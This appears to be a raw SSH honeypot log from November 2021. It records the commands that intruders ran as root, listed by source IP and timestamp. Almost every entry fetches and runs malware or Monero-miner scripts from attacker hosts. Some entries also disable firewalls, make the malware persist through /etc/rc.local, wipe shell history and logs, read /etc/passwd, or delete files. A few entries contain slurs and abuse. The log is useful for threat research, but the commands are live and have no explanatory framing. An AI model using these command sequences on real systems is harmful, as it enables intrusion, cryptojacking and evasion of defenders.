From 199.19.224.231 4-Nov-2021 01:32:09 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget http://179.43.175.58/x86_64; chmod 777 *; ./x86_64 x86; echo Molov be suckin theese dicks, accrobat acting like  goofy 
cat /etc/issue
cd /tmp/
rm -rf x86*
wget http://179.43.175.58/x86_64
chmod 777 *
./x86_64 x86
echo Molov be suckin theese dicks, accrobat acting like goofy

From 198.98.54.17 4-Nov-2021 06:01:09 ssh2 root
Exec wget -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh; busybox wget http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh; chmod 777 *; ./setup_c3pool_miner.sh 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
wget -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
busybox wget http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
chmod 777 *
./setup_c3pool_miner.sh 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 178.18.243.61 4-Nov-2021 07:37:10 ssh2 root
Exec uname -a; cd /tmp ;curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47GZnxsEvU1gRaShZCzDxo7TY7LV2688REobA3gFkk3RewKtpYGi9jK1qmFdUkaPD5N2rH5C7drRNe67z4RzVciMBgxhcu2
uname -a
cd /tmp
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47GZnxsEvU1gRaShZCzDxo7TY7LV2688REobA3gFkk3RewKtpYGi9jK1qmFdUkaPD5N2rH5C7drRNe67z4RzVciMBgxhcu2

From 192.3.141.175 4-Nov-2021 13:55:42 ssh2 root
w
halt

From 180.215.108.229 4-Nov-2021 15:58:24 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.108.229:8009/Linux4.7;chmod 777 Linux4.7;./Linux4.7;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.108.229:8009/Linux4.7
chmod 777 Linux4.7
./Linux4.7

From 61.176.68.218 4-Nov-2021 23:45:15 ssh2 root
Exec cd /var/tmp; wget http://179.43.187.169/gunnybagsbunnybins.sh; curl -O http://179.43.187.169/gunnybagsbunnybins.sh; chmod 777 gunnybagsbunnybins.sh; sh gunnybagsbunnybins.sh; tftp 179.43.187.169 -c get gunnybagsbunnytftp1.sh; chmod 777 gunnybagsbunnytftp1.sh; sh gunnybagsbunnytftp1.sh; tftp -r gunnybagsbunnytftp2.sh -g 179.43.187.169; chmod 777 gunnybagsbunnytftp2.sh; sh gunnybagsbunnytftp2.sh; rm -rf gunnybagsbunnybins.sh gunnybagsbunnytftp1.sh gunnybagsbunnytftp2.sh; rm -rf *
cd /var/tmp
wget http://179.43.187.169/gunnybagsbunnybins.sh
curl -O http://179.43.187.169/gunnybagsbunnybins.sh
chmod 777 gunnybagsbunnybins.sh
sh gunnybagsbunnybins.sh
tftp 179.43.187.169 -c get gunnybagsbunnytftp1.sh
chmod 777 gunnybagsbunnytftp1.sh
sh gunnybagsbunnytftp1.sh
tftp -r gunnybagsbunnytftp2.sh -g 179.43.187.169
chmod 777 gunnybagsbunnytftp2.sh
sh gunnybagsbunnytftp2.sh
rm -rf gunnybagsbunnybins.sh gunnybagsbunnytftp1.sh gunnybagsbunnytftp2.sh
rm -rf *
Exec cd /var/tmp; wget http://179.43.187.169/gunnybagsbunnybins.sh; curl -O http://179.43.187.169/gunnybagsbunnybins.sh; chmod 777 gunnybagsbunnybins.sh; sh gunnybagsbunnybins.sh; tftp 179.43.187.169 -c get gunnybagsbunnytftp1.sh; chmod 777 gunnybagsbunnytftp1.sh; sh gunnybagsbunnytftp1.sh; tftp -r gunnybagsbunnytftp2.sh -g 179.43.187.169; chmod 777 gunnybagsbunnytftp2.sh; sh gunnybagsbunnytftp2.sh; rm -rf gunnybagsbunnybins.sh gunnybagsbunnytftp1.sh gunnybagsbunnytftp2.sh; rm -rf *
cd /var/tmp
wget http://179.43.187.169/gunnybagsbunnybins.sh
curl -O http://179.43.187.169/gunnybagsbunnybins.sh
chmod 777 gunnybagsbunnybins.sh
sh gunnybagsbunnybins.sh
tftp 179.43.187.169 -c get gunnybagsbunnytftp1.sh
chmod 777 gunnybagsbunnytftp1.sh
sh gunnybagsbunnytftp1.sh
tftp -r gunnybagsbunnytftp2.sh -g 179.43.187.169
chmod 777 gunnybagsbunnytftp2.sh
sh gunnybagsbunnytftp2.sh
rm -rf gunnybagsbunnybins.sh gunnybagsbunnytftp1.sh gunnybagsbunnytftp2.sh
rm -rf *

From 180.215.108.229 5-Nov-2021 10:56:01 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.108.229:8009/TI;chmod 777 TI;./TI
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.108.229:8009/TI
chmod 777 TI
./TI

From 5.189.168.79 5-Nov-2021 15:36:48 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://192.3.185.234/run.sh; curl -O http://192.3.185.234/run.sh; chmod 777 run.sh; sh run.sh; tftp 192.3.185.234 -c get run.sh; chmod 777 run.sh; sh run.sh; tftp -r run2.sh -g 192.3.185.234; chmod 777 run2.sh; sh run2.sh; ftpget -v -u anonymous -p anonymous -P 21 192.3.185.234 run1.sh run1.sh; sh run1.sh; rm -rf run.sh run.sh run2.sh run1.sh; rm -rf *
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://192.3.185.234/run.sh
curl -O http://192.3.185.234/run.sh
chmod 777 run.sh
sh run.sh
tftp 192.3.185.234 -c get run.sh
chmod 777 run.sh
sh run.sh
tftp -r run2.sh -g 192.3.185.234
chmod 777 run2.sh
sh run2.sh
ftpget -v -u anonymous -p anonymous -P 21 192.3.185.234 run1.sh run1.sh
sh run1.sh
rm -rf run.sh run.sh run2.sh run1.sh
rm -rf *

From 154.12.2.254 5-Nov-2021 17:12:33 ssh2 root
w
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
wget zeusmedial.cl/-/mig
chmod +x mig
mv mig /usr/sbin/mig
mig -u root -n 1
lscpu
w
cat .bashistory
ls -alh
cat .mysql_history
cd .ssh
ls
cat lan.doc
nproc
uname -a
cat /etc/*release
cat /etc/passwd
w
cd /etc/passwd
ls
pwd
cd /root
ls
cd /
ls
exit

From 209.145.58.71 6-Nov-2021 06:50:09 ssh2 root
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
wget http://dl.packetstormsecurity.net/UNIX/penetration/log-wipers/mig-logcleaner11.tar.gz --no-check-certificate
tar xzvf mig-logcleaner11.tar.gz
cd mig-logcleaner
make linux
./mig-logcleaner -u root
cd ..
rm -rf mig-logcleaner11.tar.gz
rm -rf mig-logcleaner
w
uname -a
cat /proc/cpuinfo
ps -x
ps- x
cat /etc/issue

From 141.98.10.72 6-Nov-2021 20:49:48 ssh2 root
Exec sudo hive-passwd dayonef1edfujqicyhnyh1okugyllus12
sudo hive-passwd dayonef1edfujqicyhnyh1okugyllus12

From 205.185.115.39 7-Nov-2021 05:10:58 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget http://179.43.175.58/x86_64; chmod 777 *; ./x86_64 x86; echo Molov be suckin theese dicks, accrobat acting like goofy 
cat /etc/issue
cd /tmp/
rm -rf x86*
wget http://179.43.175.58/x86_64
chmod 777 *
./x86_64 x86
echo Molov be suckin theese dicks, accrobat acting like goofy

From 15.228.81.48 7-Nov-2021 06:55:05 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c; nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c
cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c
nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c

From 15.228.81.48 7-Nov-2021 07:31:08 ssh2 root
Exec cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c; nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c
cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c
nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 138.68.105.229 7-Nov-2021 08:58:28 ssh2 root
Exec wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
wget nasapaul.com/ninfo
chmod +x *
./ninfo

From 15.228.81.48 7-Nov-2021 10:43:17 ssh2 root
Exec cd /var/tmp; wget http://179.43.187.169/gunnybagsbunnybins.sh; curl -O http://179.43.187.169/gunnybagsbunnybins.sh; chmod 777 gunnybagsbunnybins.sh; sh gunnybagsbunnybins.sh; tftp 179.43.187.169 -c get gunnybagsbunnytftp1.sh; chmod 777 gunnybagsbunnytftp1.sh; sh gunnybagsbunnytftp1.sh; tftp -r gunnybagsbunnytftp2.sh -g 179.43.187.169; chmod 777 gunnybagsbunnytftp2.sh; sh gunnybagsbunnytftp2.sh; rm -rf gunnybagsbunnybins.sh gunnybagsbunnytftp1.sh gunnybagsbunnytftp2.sh; rm -rf *
cd /var/tmp
wget http://179.43.187.169/gunnybagsbunnybins.sh
curl -O http://179.43.187.169/gunnybagsbunnybins.sh
chmod 777 gunnybagsbunnybins.sh
sh gunnybagsbunnybins.sh
tftp 179.43.187.169 -c get gunnybagsbunnytftp1.sh
chmod 777 gunnybagsbunnytftp1.sh
sh gunnybagsbunnytftp1.sh
tftp -r gunnybagsbunnytftp2.sh -g 179.43.187.169
chmod 777 gunnybagsbunnytftp2.sh
sh gunnybagsbunnytftp2.sh
rm -rf gunnybagsbunnybins.sh gunnybagsbunnytftp1.sh gunnybagsbunnytftp2.sh
rm -rf *
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 60.19.245.96 7-Nov-2021 11:29:46 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec cd /var/tmp; wget http://179.43.187.169/gunnybagsbunnybins.sh; curl -O http://179.43.187.169/gunnybagsbunnybins.sh; chmod 777 gunnybagsbunnybins.sh; sh gunnybagsbunnybins.sh; tftp 179.43.187.169 -c get gunnybagsbunnytftp1.sh; chmod 777 gunnybagsbunnytftp1.sh; sh gunnybagsbunnytftp1.sh; tftp -r gunnybagsbunnytftp2.sh -g 179.43.187.169; chmod 777 gunnybagsbunnytftp2.sh; sh gunnybagsbunnytftp2.sh; rm -rf gunnybagsbunnybins.sh gunnybagsbunnytftp1.sh gunnybagsbunnytftp2.sh; rm -rf *
cd /var/tmp
wget http://179.43.187.169/gunnybagsbunnybins.sh
curl -O http://179.43.187.169/gunnybagsbunnybins.sh
chmod 777 gunnybagsbunnybins.sh
sh gunnybagsbunnybins.sh
tftp 179.43.187.169 -c get gunnybagsbunnytftp1.sh
chmod 777 gunnybagsbunnytftp1.sh
sh gunnybagsbunnytftp1.sh
tftp -r gunnybagsbunnytftp2.sh -g 179.43.187.169
chmod 777 gunnybagsbunnytftp2.sh
sh gunnybagsbunnytftp2.sh
rm -rf gunnybagsbunnybins.sh gunnybagsbunnytftp1.sh gunnybagsbunnytftp2.sh
rm -rf *

From 107.189.30.134 7-Nov-2021 17:36:23 ssh2 root
Exec rm x86_64; wget http://205.185.121.185/x86_64; chmod 777 *; ./x86_64 fw.x86; rm x86_64
rm x86_64
wget http://205.185.121.185/x86_64
chmod 777 *
./x86_64 fw.x86
rm x86_64

From 209.141.33.121 8-Nov-2021 14:08:39 ssh2 root
Exec curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 82.156.112.28 9-Nov-2021 06:23:34 ssh2 root
Exec curl http://82.156.112.28:8088/sevensu.x86 -o lin;chmod 777 lin;./lin
curl http://82.156.112.28:8088/sevensu.x86 -o lin
chmod 777 lin
./lin

From 60.19.245.96 9-Nov-2021 11:51:29 ssh2 root
Exec cd /var/tmp; wget http://179.43.187.169/gunnybagsbunnybins.sh; curl -O http://179.43.187.169/gunnybagsbunnybins.sh; chmod 777 gunnybagsbunnybins.sh; sh gunnybagsbunnybins.sh; tftp 179.43.187.169 -c get gunnybagsbunnytftp1.sh; chmod 777 gunnybagsbunnytftp1.sh; sh gunnybagsbunnytftp1.sh; tftp -r gunnybagsbunnytftp2.sh -g 179.43.187.169; chmod 777 gunnybagsbunnytftp2.sh; sh gunnybagsbunnytftp2.sh; rm -rf gunnybagsbunnybins.sh gunnybagsbunnytftp1.sh gunnybagsbunnytftp2.sh; rm -rf *
cd /var/tmp
wget http://179.43.187.169/gunnybagsbunnybins.sh
curl -O http://179.43.187.169/gunnybagsbunnybins.sh
chmod 777 gunnybagsbunnybins.sh
sh gunnybagsbunnybins.sh
tftp 179.43.187.169 -c get gunnybagsbunnytftp1.sh
chmod 777 gunnybagsbunnytftp1.sh
sh gunnybagsbunnytftp1.sh
tftp -r gunnybagsbunnytftp2.sh -g 179.43.187.169
chmod 777 gunnybagsbunnytftp2.sh
sh gunnybagsbunnytftp2.sh
rm -rf gunnybagsbunnybins.sh gunnybagsbunnytftp1.sh gunnybagsbunnytftp2.sh
rm -rf *

From 205.185.120.183 9-Nov-2021 16:46:10 ssh2 root
Exec wget 185.245.96.31/x86_64; wget 185.245.96.31/i686; wget 185.245.96.31/arm; wget 185.245.96.31/arc; wget 185.245.96.31/arm5; wget 185.245.96.31/arm6; wget 185.245.96.31/arm7; wget 185.245.96.31/i586; wget 185.245.96.31/mips; wget 185.245.96.31/mipsel; wget 185.245.96.31/sh4; chmod 777 *; ./arc x86; ./arm x86; ./arm5 x86; ./arm6 x86; ./arm7 x86; ./i586 x86; ./i686 x86; ./mips x86; ./mipsel x86; ./sh4 x86; ./x86_64 x86;
wget 185.245.96.31/x86_64
wget 185.245.96.31/i686
wget 185.245.96.31/arm
wget 185.245.96.31/arc
wget 185.245.96.31/arm5
wget 185.245.96.31/arm6
wget 185.245.96.31/arm7
wget 185.245.96.31/i586
wget 185.245.96.31/mips
wget 185.245.96.31/mipsel
wget 185.245.96.31/sh4
chmod 777 *
./arc x86
./arm x86
./arm5 x86
./arm6 x86
./arm7 x86
./i586 x86
./i686 x86
./mips x86
./mipsel x86
./sh4 x86
./x86_64 x86

From 193.105.6.242 10-Nov-2021 02:11:31 ssh2 root
Exec nproc; nvidia-smi --list-gpus
nproc
nvidia-smi --list-gpus

From 209.141.46.12 10-Nov-2021 05:38:52 ssh2 root
Exec curl -O http://209.141.46.12/test;chmod 777 test;./test
curl -O http://209.141.46.12/test
chmod 777 test
./test
Exec curl -O http://209.141.46.12/test;chmod 777 test;./test
curl -O http://209.141.46.12/test
chmod 777 test
./test

From 209.141.46.12 10-Nov-2021 09:38:37 ssh2 root
Exec curl -O http://209.141.46.12/LINUX;chmod 777 *;./LINUX
curl -O http://209.141.46.12/LINUX
chmod 777 *
./LINUX

From 58.64.185.50 11-Nov-2021 05:05:38 ssh2 root
Exec echo -n dzgmzwwc|md5sum;uname -a
echo -n dzgmzwwc|md5sum
uname -a

From 20.206.86.43 11-Nov-2021 05:22:45 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 209.141.46.12 12-Nov-2021 03:28:17 ssh2 root
Exec wget http://209.141.46.12/Linux2.6;chmod 777 *;./Linux2.6
wget http://209.141.46.12/Linux2.6
chmod 777 *
./Linux2.6

From 93.123.93.104 12-Nov-2021 09:44:33 ssh2 root
Exec uname -a;cd /tmp;wget http://66.151.51.55/max.txt;perl max.txt;rm -rf max.*;history -c;clear
uname -a
cd /tmp
wget http://66.151.51.55/max.txt
perl max.txt
rm -rf max.*
history -c
clear

From 142.93.219.198 13-Nov-2021 02:40:15 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://149.56.35.183/skidnet.sh; chmod 777 *; sh skidnet.sh; tftp -g 149.56.35.183 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://149.56.35.183/skidnet.sh
chmod 777 *
sh skidnet.sh
tftp -g 149.56.35.183 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 129.227.219.30 13-Nov-2021 05:49:57 ssh2 root
w

From 51.68.180.71 13-Nov-2021 05:50:01 ssh2 root
lscpu
exit

From 129.227.219.30 13-Nov-2021 05:50:28 ssh2 root
crontab -l
ping yahoo.com
id richard
reboot
/sbin/init
fuck you asshole :))))
did you see my dick ?????
you faggot

From 136.144.41.139 13-Nov-2021 06:45:32 ssh2 root
Exec curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 45dNkjTQGgT77r9AEMyHdCGan5tpuekXaHFhFW99dQ8hUS35oZQEYXddFE52jxVdfUNrAD4ZyZ44BgHfgk5SjHdoLjGdJnQ
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 45dNkjTQGgT77r9AEMyHdCGan5tpuekXaHFhFW99dQ8hUS35oZQEYXddFE52jxVdfUNrAD4ZyZ44BgHfgk5SjHdoLjGdJnQ
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 209.141.46.12 13-Nov-2021 22:53:39 ssh2 root
Exec wget http://209.141.46.12/Linux4.7;chmod 777 *;./Linux4.7
wget http://209.141.46.12/Linux4.7
chmod 777 *
./Linux4.7
Exec wget http://209.141.46.12/Linux4.7;chmod 777 *;./Linux4.7
wget http://209.141.46.12/Linux4.7
chmod 777 *
./Linux4.7

From 209.141.59.77 14-Nov-2021 01:58:55 ssh2 root
Exec wget dawis.tw/x86_64; wget dawis.tw/i686; wget dawis.tw/arm; wget dawis.tw/arc; wget dawis.tw/arm5; wget dawis.tw/arm6; wget dawis.tw/arm7; wget dawis.tw/i586; wget dawis.tw/mips; wget dawis.tw/mipsel; wget dawis.tw/sh4; chmod 777 *; ./arc x86; ./arm x86; ./arm5 x86; ./arm6 x86; ./arm7 x86; ./i586 x86; ./i686 x86; ./mips x86; ./mipsel x86; ./sh4 x86; ./x86_64 x86
wget dawis.tw/x86_64
wget dawis.tw/i686
wget dawis.tw/arm
wget dawis.tw/arc
wget dawis.tw/arm5
wget dawis.tw/arm6
wget dawis.tw/arm7
wget dawis.tw/i586
wget dawis.tw/mips
wget dawis.tw/mipsel
wget dawis.tw/sh4
chmod 777 *
./arc x86
./arm x86
./arm5 x86
./arm6 x86
./arm7 x86
./i586 x86
./i686 x86
./mips x86
./mipsel x86
./sh4 x86
./x86_64 x86

From 222.186.34.114 14-Nov-2021 12:38:31 ssh2 root
Exec wget http://222.186.34.114:280/why9271;chmod 777 why9271;./why9271
wget http://222.186.34.114:280/why9271
chmod 777 why9271
./why9271

From 111.67.194.201 14-Nov-2021 14:54:02 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;rm -f *;cd /home;rm -f *;wget http://139.99.91.161/pl.sh;chmod 777 pl.sh;./pl.sh;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
rm -f *
cd /home
rm -f *
wget http://139.99.91.161/pl.sh
chmod 777 pl.sh
./pl.sh

From 42.193.169.139 15-Nov-2021 03:10:40 ssh2 root
Exec curl -s -L http://152.136.149.104:280/1.sh | bash -s
curl -s -L http://152.136.149.104:280/1.sh | bash -s

From 111.67.206.137 15-Nov-2021 08:54:43 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget http://111.67.206.137/sora.sh;chmod 777 sora.sh;sh sora.sh;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget http://111.67.206.137/sora.sh
chmod 777 sora.sh
sh sora.sh
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget http://111.67.206.137/sora.sh;chmod 777 sora.sh;sh sora.sh;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget http://111.67.206.137/sora.sh
chmod 777 sora.sh
sh sora.sh

From 111.67.206.137 15-Nov-2021 11:28:25 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget http://111.67.206.137/Pls;chmod 777 Pls;./Pls;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget http://111.67.206.137/Pls
chmod 777 Pls
./Pls

From 111.67.206.137 15-Nov-2021 17:43:09 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget http://111.67.206.137/Kjl;chmod 777 Kjl;./Kjl;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget http://111.67.206.137/Kjl
chmod 777 Kjl
./Kjl
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget http://111.67.206.137/Kjl;chmod 777 Kjl;./Kjl;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget http://111.67.206.137/Kjl
chmod 777 Kjl
./Kjl

From 139.198.33.96 15-Nov-2021 20:24:21 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr

From 209.141.59.77 15-Nov-2021 21:14:05 ssh2 root
Exec wget dawis.tw/x86_64; wget dawis.tw/i686; wget dawis.tw/arm; wget dawis.tw/arc; wget dawis.tw/arm5; wget dawis.tw/arm6; wget dawis.tw/arm7; wget dawis.tw/i586; wget dawis.tw/mips; wget dawis.tw/mipsel; wget dawis.tw/sh4; chmod 777 *; ./arc x86; ./arm x86; ./arm5 x86; ./arm6 x86; ./arm7 x86; ./i586 x86; ./i686 x86; ./mips x86; ./mipsel x86; ./sh4 x86; ./x86_64 x86
wget dawis.tw/x86_64
wget dawis.tw/i686
wget dawis.tw/arm
wget dawis.tw/arc
wget dawis.tw/arm5
wget dawis.tw/arm6
wget dawis.tw/arm7
wget dawis.tw/i586
wget dawis.tw/mips
wget dawis.tw/mipsel
wget dawis.tw/sh4
chmod 777 *
./arc x86
./arm x86
./arm5 x86
./arm6 x86
./arm7 x86
./i586 x86
./i686 x86
./mips x86
./mipsel x86
./sh4 x86
./x86_64 x86

From 8.225.226.100 17-Nov-2021 10:56:30 ssh2 root
Exec uname -a;wget -4 http://www.fredfoxs.at.ua/files/test;curl -O http://www.fredfoxs.at.ua/files/test;dget -4 http://www.fredfoxs.at.ua/files/test;tar -xzf test;rm -f test;cd ./-s;rpm -Uvh shc.rpm;./.s;sleep 50;rm -rf ./-s;rm -rf /dev/shm/c3pool /root/c3pool;pkill -f xmrig;rm -rf ~/.bash_history;history -cw
uname -a
wget -4 http://www.fredfoxs.at.ua/files/test
curl -O http://www.fredfoxs.at.ua/files/test
dget -4 http://www.fredfoxs.at.ua/files/test
tar -xzf test
rm -f test
cd ./-s
rpm -Uvh shc.rpm
./.s
sleep 50
rm -rf ./-s
rm -rf /dev/shm/c3pool /root/c3pool
pkill -f xmrig
rm -rf ~/.bash_history
history -cw

From 222.186.133.160 17-Nov-2021 13:49:27 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/sudu5;chmod 777 sudu5;./sudu5;echo "cd /tmp/">>/etc/rc.local;echo "./sudu5&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/sudu5
chmod 777 sudu5
./sudu5
echo "cd /tmp/">>/etc/rc.local
echo "./sudu5
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/sudu5;chmod 777 sudu5;./sudu5;echo "cd /tmp/">>/etc/rc.local;echo "./sudu5&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/sudu5
chmod 777 sudu5
./sudu5
echo "cd /tmp/">>/etc/rc.local
echo "./sudu5
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 216.240.130.102 17-Nov-2021 18:23:09 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr

From 222.186.133.160 17-Nov-2021 22:47:51 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/sudo;chmod 777 sudo;./sudo;echo "cd /tmp/">>/etc/rc.local;echo "./sudo&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/sudo
chmod 777 sudo
./sudo
echo "cd /tmp/">>/etc/rc.local
echo "./sudo
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
